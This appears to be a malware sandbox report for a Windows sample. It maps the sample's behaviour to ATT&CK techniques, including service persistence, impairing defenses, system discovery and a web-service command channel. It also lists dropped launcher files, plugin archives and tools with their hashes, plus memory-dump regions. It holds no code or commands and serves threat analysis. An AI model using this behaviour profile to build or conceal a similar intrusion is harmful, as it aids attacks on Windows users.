System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e3c8b3c4e6fe598a3ad67e8c927c5783

SHA1
5417f1b5a1ba58cc7faa06d229d45fc6c69eb0e1

SHA256
d78cc351bfa76941500fb485d347fbe23dfb2f2441ae9a0700f42edb7111f735

SHA512
26d3c0a37f2f923363dc1a7c9ce27c2ba6d26b03bc6ff8f0c64d2e949358fe7bcde0879f3a1bf8d61da24a120afc21ce9ecec340825897b9bd7817f54ab458f3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
89ad0bd69a043c090d7c5ad81a689626

SHA1
858c4e0ab2d247717adb5cabc7b3c5629291ee3a

SHA256
75e71d0ba51a74dccb4d0b856d7cb39acdd6817d9e9e63058b0682324d46a171

SHA512
9ae578855b7d720ae87ca4864a5584c0cf76d8ac9442da0e4609a528b50caef8a193e59bf9fe251962ff75c59511be6b120b3a11fab25054ee9ef188e1ab2be2

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabAD32.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarAD45.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
561d2938cebf4a6aa6f68bacd4c224ae

SHA1
2988072eec45e9382393e16bbfe099a5a6efa2c6

SHA256
693f243c6059b7744ee131d7615c018c70804fa3aaa51d247ce9baef7070f149

SHA512
2f2a8d71c32378bc43883f76367bbd2ffb06098c6fcac158772e841f05d58c76862672ec5825adcced0d074b12c72e63403d38cfed1dd935aaba46bcdaa79557

Download Submit
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

Filesize
12B

MD5
1d734d2975d3221595424547b0273439

SHA1
a8544a97d59905449153edd059269240bed997b7

SHA256
3032300b906427a01ed596533f0b8c8e41e1c2bd697758d1b57fa975b96d6042

SHA512
caacff09cbb18a8eadbbf62a09f6102d1553e3c37400b4d6927e47ce2d968032695c83f3624437a98ff48d79827e3ad21dc02522e63eab61be260cbf3b709632

Download Submit
C:\Users\Admin\AppData\Roaming\services\01plugins7727.rar

Filesize
2.9MB

MD5
a8ed41e070a43f585a5bdd420150b46d

SHA1
26525d416739c378f045a57086bcb243d5bb5829

SHA256
63a24f1ac4393f02d3d4e72963e8158eac4d6f9b93a18abe1d4ea25a98027182

SHA512
c89799edaa8b8cb0e4f572ae0d35fb08f85919b9cf1399d311c9f40207335e4cdd90fab47d7c81424876cbc147cec231ad9f2976f7f7a593f07e382129a00589

Download Submit
C:\Users\Admin\AppData\Roaming\services\02plugins549.rar

Filesize
9.6MB

MD5
5cfa362d6d89d663bdb58ccd5333a54a

SHA1
a4753db03c5ddcc3f07eb4ce3b9f909fb9807fcd

SHA256
6f3299d60da1cee65c07ff09c0ed630eeccbf60d2b7c5a523a82b8b1f9d7242f

SHA512
55bf3494ffcdcbe1de0e798c2d5bfa8ade3fd1e68d77481eec9a0a2731569ade26d69b18cbe26a941c2459644ca21bd9e53a521ecad7b0065a45ce056c4a88db

Download Submit
C:\Users\Admin\AppData\Roaming\services\03plugins2536.rar

Filesize
2.8MB

MD5
8349c8699b21140a3354eef28a73d7ae

SHA1
dedad5a5102f8d54530b212617a3144e31e4fe33

SHA256
49f5a9b2803a23d7a5fafd6d717b725f06f90d5e928976113ded3cbd1ef1388f

SHA512
746687363a395447763a87f90df079be13c84867f31aa685b4abde9d568eace12b8d8847a8987f8a15d6052bfea1bedb61d851cabf9cf50bcc215aa54ab60730

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll

Filesize
2KB

MD5
7de0541eb96ba31067b4c58d9399693b

SHA1
a105216391bd53fa0c8f6aa23953030d0c0f9244

SHA256
934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e

SHA512
e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest

Filesize
1KB

MD5
f0fc065f7fd974b42093594a58a4baef

SHA1
dbf28dd15d4aa338014c9e508a880e893c548d00

SHA256
d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693

SHA512
8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll

Filesize
6KB

MD5
a37d6bd996505a42c3f29d0ed54b9ae7

SHA1
36759677d2e52e9b75b6a6b14f4f03b0dc1b0e79

SHA256
606f3b07ef6896fd75f51bd1ca1af4ed8075b22f9ca1cf8b1a0bf5bfc6d3074a

SHA512
8a8fa253062bac723dc7cffbff199fa78f7b6975019bfbdf11372711b58f0b8d1dbe1ff574280343abf290d99210c2feb8a691d1504a11d4bd934eaaa47fd149

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

Filesize
364KB

MD5
93fde4e38a84c83af842f73b176ab8dc

SHA1
e8c55cc160a0a94e404f544b22e38511b9d71da8

SHA256
fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

SHA512
48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest

Filesize
1KB

MD5
1b6de83d3f1ccabf195a98a2972c366a

SHA1
09f03658306c4078b75fa648d763df9cddd62f23

SHA256
e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724

SHA512
e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce

Download Submit
C:\Users\Admin\AppData\Roaming\services\wget.exe

Filesize
4.9MB

MD5
8c04808e4ba12cb793cf661fbbf6c2a0

SHA1
bdfdb50c5f251628c332042f85e8dd8cf5f650e3

SHA256
a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272

SHA512
9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

Download Submit
C:\Users\Admin\AppData\Roaming\services\winrar.exe

Filesize
2.1MB

MD5
f59f4f7bea12dd7c8d44f0a717c21c8e

SHA1
17629ccb3bd555b72a4432876145707613100b3e

SHA256
f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

SHA512
44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Roaming\services\2plugin28438

Filesize
7.2MB

MD5
3d42a95de858de974d5dad1cbc7e87ed

SHA1
230e157d35007fbf594243e93fa2bf84982c5c46

SHA256
47a98e0d3ba207cf0afeef5d9d04c893dbe5bfb6e0c5537fa583bdb67c915010

SHA512
500072e9c94a92e23b9f24785c8218d35224422a4d2fbeb2ac273a3ef6957a93b73b8716297bdbbab8334ba5fb1700415c50d39b6be45ae9dd467dbebe9b4974

Download Submit
\Users\Admin\AppData\Roaming\services\3plugin13200

Filesize
429KB

MD5
233ea23b1c1587f1cf895f08ba6da10b

SHA1
e2b5131d03aa3bc56a004ba6debc6d57322e0691

SHA256
c7e20eafa32a38282616d78c43c574991d30fe2fbc876141fa76e5ff538c3b5c

SHA512
4f1d72732e8ea42665b325060b1dcbe8bd47b7fb78ba9e9be9d5da8c9be97206bce8b9fd319a95cd9514fa2ff58eb9194068bde09af4bef0e6d3435562e647a9

Download Submit
\Users\Admin\AppData\Roaming\services\Launhcer.exe

Filesize
364KB

MD5
e5c00b0bc45281666afd14eef04252b2

SHA1
3b6eecf8250e88169976a5f866d15c60ee66b758

SHA256
542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903

SHA512
2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

Download Submit
\Users\Admin\AppData\Roaming\services\plugin31849

Filesize
459KB

MD5
5d5483b1ef3cfe2abaebcdaeace7da21

SHA1
6915c04741b3e4380577e497527ad15fc3108495

SHA256
ff7a3b83cf95c7c27b59c4db9de3f7b67c5d2909c4d72d46299654c108738ebd

SHA512
1ea901be644aac5649cf658510e2e4e88da26e4086d876ab3fc88bed25a4d8ab290077fe373757827c395398f0c9022c253ea7b87c71691d6fb5deab9ac24dfe

Download Submit
memory/300-585-0x0000000002920000-0x0000000002928000-memory.dmp

Filesize
32KB

Download
memory/300-584-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

Filesize
2.9MB

Download
memory/688-610-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/688-607-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/688-606-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/688-612-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/688-609-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/688-608-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/772-579-0x0000000000400000-0x0000000002853000-memory.dmp

Filesize
36.3MB

Download
memory/1368-510-0x00000000054C0000-0x00000000058C0000-memory.dmp

Filesize
4.0MB

Download
memory/1368-512-0x0000000076D10000-0x0000000076EB9000-memory.dmp

Filesize
1.7MB

Download
memory/1368-514-0x0000000076670000-0x00000000766B7000-memory.dmp

Filesize
284KB

Download
memory/1368-511-0x00000000054C0000-0x00000000058C0000-memory.dmp

Filesize
4.0MB

Download
memory/1368-516-0x0000000000400000-0x000000000285C000-memory.dmp

Filesize
36.4MB

Download
memory/1492-167-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/1540-575-0x0000000000400000-0x0000000002853000-memory.dmp

Filesize
36.3MB

Download
memory/2268-515-0x0000000000090000-0x0000000000099000-memory.dmp

Filesize
36KB

Download
memory/2268-518-0x0000000000A00000-0x0000000000E00000-memory.dmp

Filesize
4.0MB

Download
memory/2268-521-0x0000000076670000-0x00000000766B7000-memory.dmp

Filesize
284KB

Download
memory/2268-519-0x0000000076D10000-0x0000000076EB9000-memory.dmp

Filesize
1.7MB

Download
memory/2312-0-0x00000000000B0000-0x00000000000B1000-memory.dmp

Filesize
4KB

Download
memory/2532-494-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/2584-552-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/2616-605-0x0000000000DA0000-0x0000000000DA8000-memory.dmp

Filesize
32KB

Download
memory/2616-604-0x0000000019DF0000-0x000000001A0D2000-memory.dmp

Filesize
2.9MB

Download
memory/2712-601-0x0000000140000000-0x0000000140E40000-memory.dmp

Filesize
14.2MB

Download
memory/2756-626-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2756-625-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2756-629-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2756-628-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2756-620-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2756-614-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2756-623-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2756-624-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2756-616-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2756-622-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2756-617-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2756-615-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2756-621-0x00000000000B0000-0x00000000000D0000-memory.dmp

Filesize
128KB

Download
memory/2756-619-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2756-618-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2944-524-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/3064-549-0x0000000140000000-0x0000000140E40000-memory.dmp

Filesize
14.2MB

Download
memory/3064-540-0x0000000076EC0000-0x0000000076EC2000-memory.dmp

Filesize
8KB

Download
memory/3064-542-0x0000000076EC0000-0x0000000076EC2000-memory.dmp

Filesize
8KB

Download
memory/3064-538-0x0000000076EC0000-0x0000000076EC2000-memory.dmp

Filesize
8KB

Download
memory/3064-543-0x0000000076ED0000-0x0000000076ED2000-memory.dmp

Filesize
8KB

Download
memory/3064-545-0x0000000076ED0000-0x0000000076ED2000-memory.dmp

Filesize
8KB

Download
memory/3064-547-0x0000000076ED0000-0x0000000076ED2000-memory.dmp

Filesize
8KB

Download